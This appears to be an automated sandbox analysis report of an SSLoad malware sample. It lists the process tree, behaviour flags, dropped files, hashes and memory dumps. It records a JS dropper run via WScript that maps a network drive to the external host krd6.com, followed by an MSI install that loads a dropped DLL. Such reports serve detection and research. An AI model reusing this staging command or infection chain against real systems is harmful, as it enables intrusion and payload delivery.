  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
  PID:2188
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6044 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID:4856
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
  PID:4204
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:12⤵PID:1336
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4548
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2904
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1412
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\2024-04-17-SSLoad-malware-and-artifacts.zip"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3316
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js-stripped.txt1⤵PID:4568
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js1⤵PID:4744
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js"1⤵
- Blocklisted process makes network request
- Modifies system certificate store
PID:3452
-
C:\Windows\system32\net.exenet use A: \\krd6.com@80\share\ /persistent:no1⤵
- Process spawned unexpected child process
PID:2060
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js"1⤵
- Modifies system certificate store
PID:4672
-
C:\Windows\system32\net.exenet use A: \\krd6.com@80\share\ /persistent:no1⤵
- Process spawned unexpected child process
PID:460
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js1⤵PID:556
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js-stripped.js"1⤵PID:5056
-
C:\Windows\system32\net.exenet use A: \\krd6.com@80\share\ /persistent:no1⤵
- Process spawned unexpected child process
PID:5024
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\kjgghhj\2024-04-17-IOCs-from-SSLoad-activity.txt1⤵PID:912
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\kjgghhj\avp.msi"1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3080
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4212 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AE37186F3A7DA742CD4F5E228706B755 C2⤵
- Loads dropped DLL
PID:3736 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 448AB9541D633E9FD8198653CCCBE003 C2⤵
- Loads dropped DLL
PID:5088 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:808
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding CE9E199AA7B76E7B39604F73F6D566602⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:1952
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:2756
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /f "C:\Users\Admin\Desktop\kjgghhj\avp.msi"1⤵PID:2968
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\kjgghhj\avp.msi"1⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:3444
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2408
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3748
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Config.Msi\e5a8be7.rbs
  Filesize: 1KB
  MD5: a0a7a241b8c58898ba262f98d0157658
  SHA1: 5d5a2381b037e1a2a503d8bed862f596252dbc28
  SHA256: 8b4ff903e0e136fcb56605660b7aa8d51e65a0450fa5b7710824a2f826be9c49
  SHA512: 5f868f4044c3df11fa4bb4f23007efad830b46bb0f2ee772a6634876eb8499c132583f43f875443e0959108628506dbb18d670871258fce3bfcada741e632140

- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\357F04AD41BCF5FE18FCB69F60C6680F_D51703210E24E5BE9834FB730147157F
  Filesize: 1KB
  MD5: bb06ce99ccfa5cb285e5df127cdd634c
  SHA1: b84c5a177c1a08f037fc7e7681625f7caa225cf5
  SHA256: 10f5e81a81da6eaea873d03dde62fef03d4df1c176a43f6af807dfe997af6ae3
  SHA512: 33f690eeaf9d5850a545ff2e88778224861b87e7ec9ecfd832ddfd287bf213a469676df5cf09e532ddb7060c8a31f13e99f237461f936898987500282a8ab1cd

- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554E
  Filesize: 1KB
  MD5: b340f5f01c138c326f8db7c21556b9df
  SHA1: 2bf8956694e3ee5796c31a6aa4ea7707650732ca
  SHA256: fa0b5479235a952591306e204e27d33c4870f48f0c1708ca77f5c1a9a4f3221e
  SHA512: e056ea7305482f2b561427190aa84ccc7407e6e0a27c44595806b2e6511533742f6e7c1317d9005f959593e6e69990130402580bc588fcd398b0ae6492d7b3f3

- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\357F04AD41BCF5FE18FCB69F60C6680F_D51703210E24E5BE9834FB730147157F
  Filesize: 540B
  MD5: 64dc1cab145347d4f9ca777a6c2aba2d
  SHA1: ec7d025bfce46b9c7e1c64249e3bf2216e866d0f
  SHA256: ced28eeb41197c4efff6ede915bc42b3a1a7b99b12d5ecb08777070e26e36b72
  SHA512: fabbde1c8353dc7d5cee85612f11da399045f97bd315155e26c20a9080fffa510ae6ace81eb886a3be8a856ea44a066f9cc24972eccc86bf16528bfeceda365d

- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554E
  Filesize: 536B
  MD5: bf88d231c2335215d653403ec64953b3
  SHA1: 8161d39ee8bd0c84b9fb9ccb1761ae08407bce9b
  SHA256: 0d75a6a173a1fc11561ee105f7f5c92af95ea9fe12d4ecccdacf1a435745c9c2
  SHA512: 8f8e7da4fd7b97708d69c13217358fdd428b3ebfdea6406cb5d8bf2100ff58ecb8e671e7c4b9d617c41a1d206a5e1a6d4df1b664c5667993457dd775a0988cc4

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: 4b4f91fa1b362ba5341ecb2836438dea
  SHA1: 9561f5aabed742404d455da735259a2c6781fa07
  SHA256: d824b742eace197ddc8b6ed5d918f390fde4b0fbf0e371b8e1f2ed40a3b6455c
  SHA512: fef22217dcdd8000bc193e25129699d4b8f7a103ca4fe1613baf73ccf67090d9fbae27eb93e4bb8747455853a0a4326f2d0c38df41c8d42351cdcd4132418dac

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: eaa3db555ab5bc0cb364826204aad3f0
  SHA1: a4cdfaac8de49e6e6e88b335cfeaa7c9e3c563ca
  SHA256: ef7baeb1b2ab05ff3c5fbb76c2759db49294654548706c7c8e87f0cde855b86b
  SHA512: e13981da51b52c15261ecabb98af32f9b920651b46b10ce0cc823c5878b22eb1420258c80deef204070d1e0bdd3a64d875ac2522e3713a3cf11657aa55aeccd4

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 6KB
  MD5: d20161000a5f66b5af252b235e4204cb
  SHA1: c157a794e40f0756be5b44ad8dd2fa6943c97a38
  SHA256: 4b6644217af9f9f7865058afa8c8980006a43ff4cdc46a7d14ff385db9e89675
  SHA512: f22d0a99ec0792748e659d4a490d1bf91c32a6a8c99ff4d209a9788dacbed96b5c0403e4ad7a4d7a9ada0e0c530a935a07fc9d9aad81755dec3ff431d5c860e7

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 6KB
  MD5: fd23835304281e128136b36da36b7c31
  SHA1: de2026562b0db01c0e215d978744cf50f1300e3e
  SHA256: 8c916f389c5d2b34edc5110035add12a60ea387c9fbbcc1b8aba4579efc4757e
  SHA512: 29647e897ea6a6fa8920e393d367d3dad6ea09b67bd280bd56a48d28349cdbdbdc6eec54060da2d6a6ced48d86ce83075a7b6c9e615194c8869a41b114c26725

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 6KB
  MD5: 92bb7e4adadf14e7f302b67d4357cc07
  SHA1: d366c3949e5eb71cb551455ad816e9fe3b2a6a48
  SHA256: 304f0c99bbdbe74fdecefdfecdcfc2e3ba9d4a4d77b4d3d57033f044adbef3d3
  SHA512: 45389e50276ef2bab5ae71fc8ee5158b51fa23619b15816366c67c246254523803f7344ffa33f539fe4869e3925dc745b5e8dd6c35a204443546ab9184b577a5

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
  Filesize: 16B
  MD5: 46295cac801e5d4857d09837238a6394
  SHA1: 44e0fa1b517dbf802b18faf0785eeea6ac51594b
  SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
  SHA512: 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
  Filesize: 16B
  MD5: 206702161f94c5cd39fadd03f4014d98
  SHA1: bd8bfc144fb5326d21bd1531523d9fb50e1b600a
  SHA256: 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
  SHA512: 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 11KB
  MD5: 589a1a59a9dd78f234bb4a07cb3a51d7
  SHA1: 9949c6bd0faaef4ee3ee2842ecaf53a3f7ada2bd
  SHA256: d7c75706d0853b977a47d90386d7e8130e980507112dce77b57191f32caccabc
  SHA512: ca777ab1fb4d69982f886a5e97c6c72d04b97af2a7157c781272a63d1103254dc0f1c96506d05c8bfad32ba0826dbcdc1309a358eaf9071ec15e71bb68f6e493

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 11KB
  MD5: 0ca4f1179d157759afbb3719f3e43470
  SHA1: 55120bed645c3ce358e30496596c90edf9fec8cb
  SHA256: 9026c04cd985bd977ab6daca24d50af0e5b21bfafe791155df8e2b4dbe8db16d
  SHA512: b46c042e90261f5c44d65ae1298edd79cb5d1e61f5a47bfdf1258c6f0d1d02441549ee3e705dae2501480adc01e2d58ed61cb9ac677e3e4fc5c0cdcd55df74db

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 11KB
  MD5: de79436f968aec8e6c99c8282f250a7e
  SHA1: 79472efcd152528fb5031beb846fcf9a101f66b9
  SHA256: a28fc8a2b6522a4fefa38903bdd646c66713f859026146816222bded06378d77
  SHA512: 12b1fd91014a472906f0284bf26dd01132578434c92cb43f30864abd3dbbfdeaa19a27a6384c02593bbb957d271d7bf17d025f8c738f9aa85fd01239e9c66d85

- C:\Users\Admin\AppData\Local\Temp\MSI5332.tmp
  Filesize: 436KB
  MD5: 475d20c0ea477a35660e3f67ecf0a1df
  SHA1: 67340739f51e1134ae8f0ffc5ae9dd710e8e3a08
  SHA256: 426e6cf199a8268e8a7763ec3a4dd7add982b28c51d89ebea90ca792cbae14dd
  SHA512: 99525aaab2ab608134b5d66b5313e7fc3c2e2877395c5c171897d7a6c66efb26b606de1a4cb01118c2738ea4b6542e4eb4983e631231b3f340bf85e509a9589e

- C:\Users\Admin\AppData\Local\sharepoint\forcedelctl.dll
  Filesize: 956KB
  MD5: b28a478eb5b99efcdc7caf428bffb89a
  SHA1: d394c7b8fe15753bfbff79fb4f648f6f8bae70f9
  SHA256: 3bca1dcaef4430272b9029c9a4bc8be0d45ecff66e8de8679ed30d8afab00f6f
  SHA512: decb2581f64949bfaaaf0368917f0705d7a4b7392ec272eda025cf06a4384ec4cdd5202081c2e085f00645029dd96bfef262e8628bed1861185adf6281c1cc88

- C:\Users\Admin\Desktop\kjgghhj\2024-04-17-IOCs-from-SSLoad-activity.txt
  Filesize: 4KB
  MD5: adb0c4b7e77a1b56fa3e765047a0a19a
  SHA1: a6f53658d4ac8730f5d809cd9d833c4c0c1d9019
  SHA256: 89394738e3ba17782ee420e7043226090310fbbf6485657d2014c1462d829bc2
  SHA512: 17671ced965346e5e1cd7eb835a04bbb607680e2d63115ecbf3137c15bae4b2d323e0739a8f79a364016c989cb567030cd07e941b62bebee8d351b499206e742

- C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js
  Filesize: 860KB
  MD5: a19108f07f6bc323fd351e46fcf76fd3
  SHA1: 42a811f94a7294d6d870641f4a54f5ab67e23d16
  SHA256: 2b36385eea638d0d1b6cd608a1ecf500281c94cbb6454fe1bf13dc92e4a8b028
  SHA512: a79abcff48c6c87ef51d2ab09d6978014c18b30709260220ca4d38217a4591b6dd7065e1f69da896b1b0d50426a7204e5b01fc1015e30fabf7786cfce6d5faf7

- C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js-stripped.txt
  Filesize: 1KB
  MD5: 867fc9cba41c84586144bd84d30566f4
  SHA1: ab69bb14eebd02b08e4c1b99b0739d119db7746a
  SHA256: 54d1824db32b28e82ac04fe2e3d88796c12c9a04e76d6025714861f43d862129
  SHA512: 32d8fd157c232677950571ed76ebfabb632f1512ae785dddf950f9d9ac24d88929c3653b42f31e2afc57832af92477dfdcdd04d4c2f6dde8e7671f020fb6ca50

- C:\Users\Admin\Desktop\kjgghhj\avp.msi
  Filesize: 1.4MB
  MD5: 4d81be09c23e02fab7364e508c21c111
  SHA1: 52cae521d7a808c8206f4b5afd6b037bc573b50e
  SHA256: dcae57ec4b69236146f744c143c42cc8bdac9da6e991904e6dbf67ec1179286a
  SHA512: 4f5b4fdeb9a056025455ede8ee6e1757da8db64f9692df2a46558a3c04aaec551734b4d75803bbd579e1163b9aba5005f71c5efb22ee3d336779804a11b2b5a5

- C:\Users\Admin\Downloads\Unconfirmed 564349.crdownload
  Filesize: 2.0MB
  MD5: 3117207664340b08ae8197d504348de1
  SHA1: 240104337afbf53f261df29c09239480642b6936
  SHA256: 151fe8f44b4257308aae4dd4a4081fe85d465756b137ed29a10638b246a60a01
  SHA512: 25493e6ed25b17ad219cc8964a55ae0a2ac10be86dc7bb15d35938f5341dd59fbd149cb7624cf3b9564b4f88d04da094d4218e60846e6c84feb0f0e69d378a8e

- \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
  Filesize: 23.7MB
  MD5: 9416ef7532c00a247412c82c84bb8122
  SHA1: 54852bfd929a42737796697d394917d0c0158f31
  SHA256: 4d711c3c755f1709fdbe075d1b845d50094d86fda46b6ed2e390f3d218d68464
  SHA512: d64bea29cf3b6fa1e95a9e2433c1c5d229d59c55baf71170d8781de5921c819aac1bc477cf4787d640022ea7454add0d020cf50ac3e4616561e3b183dc1346b8

- \??\Volume{a968b372-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{843a17f9-9ecd-49a6-84d6-fc6aaf72e97e}_OnDiskSnapshotProp
  Filesize: 6KB
  MD5: 06347319e840a70f5d2be693001bc31e
  SHA1: d85c0657f42433f691d35d14635f91ac6186c196
  SHA256: accd019a54ef0c0d94494ecf25120940ca18400d0380d2e0bce5875ca6cc9dc6
  SHA512: 2e535bec2bb52038c9862cd8d9a647dd4121333f1dd4525c08ae2333fbddf783908048b56c56f843991f336d9fa708771a59c774699afaa2324d29b9199a2e9a

- \??\pipe\LOCAL\crashpad_4628_GWVWPVAIEVXKOBCW
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

- memory/1952-290-0x0000000010000000-0x00000000100F9000-memory.dmp
  Filesize: 996KB

- memory/1952-291-0x0000000003530000-0x00000000035A3000-memory.dmp
  Filesize: 460KB

- memory/2408-298-0x0000021D56410000-0x0000021D56411000-memory.dmp
  Filesize: 4KB

- memory/2408-300-0x0000021D56410000-0x0000021D56411000-memory.dmp
  Filesize: 4KB

- memory/2408-304-0x0000021D56410000-0x0000021D56411000-memory.dmp
  Filesize: 4KB

- memory/2408-305-0x0000021D56410000-0x0000021D56411000-memory.dmp
  Filesize: 4KB

- memory/2408-310-0x0000021D56410000-0x0000021D56411000-memory.dmp
  Filesize: 4KB

- memory/2408-309-0x0000021D56410000-0x0000021D56411000-memory.dmp
  Filesize: 4KB

- memory/2408-308-0x0000021D56410000-0x0000021D56411000-memory.dmp
  Filesize: 4KB

- memory/2408-307-0x0000021D56410000-0x0000021D56411000-memory.dmp
  Filesize: 4KB

- memory/2408-306-0x0000021D56410000-0x0000021D56411000-memory.dmp
  Filesize: 4KB

- memory/2408-299-0x0000021D56410000-0x0000021D56411000-memory.dmp
  Filesize: 4KB